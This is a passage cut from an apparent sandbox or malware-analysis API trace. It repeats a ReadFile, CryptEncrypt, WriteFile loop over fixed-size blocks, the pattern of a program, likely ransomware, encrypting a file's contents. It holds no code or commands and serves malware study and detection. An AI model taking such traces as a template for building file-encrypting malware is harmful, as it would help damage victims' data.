pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.025] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.025] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.025] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.025] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.025] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.025] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.026] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.026] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.026] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.026] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.026] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.026] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.026] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.026] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.026] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.026] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.026] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.026] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.026] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.026] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.026] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.027] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.027] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.027] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.027] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.027] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.027] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.027] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.027] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.027] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.027] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.027] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.027] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.027] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.027] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.027] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.028] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.028] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.028] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.028] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.028] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.028] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.028] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.028] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.028] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.028] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.028] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.028] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.028] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.028] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.029] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.029] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.029] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.029] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.029] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.029] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.029] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.029] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.029] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.029] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.029] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.029] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.029] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.029] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.029] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.030] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.030] 